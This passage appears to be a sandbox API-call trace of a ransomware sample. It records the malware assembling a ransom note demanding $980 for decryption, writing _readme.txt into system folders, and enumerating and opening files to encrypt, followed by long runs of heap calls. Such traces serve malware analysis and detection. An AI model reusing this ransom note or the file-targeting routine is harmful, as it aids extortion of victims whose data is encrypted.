e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.880] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.880] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.880] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.880] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.880] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.880] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.881] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.881] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.881] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.881] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.881] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7418 [0227.881] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.881] PathFindExtensionW (pszPath="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned=".mui" [0227.881] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.881] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7418 | out: hHeap=0x630000) returned 1 [0227.881] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.881] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.882] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.882] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0227.882] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.882] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0227.882] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.882] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.882] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.882] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.882] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.882] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.882] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.882] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.882] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.882] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.882] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.882] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.884] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.884] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 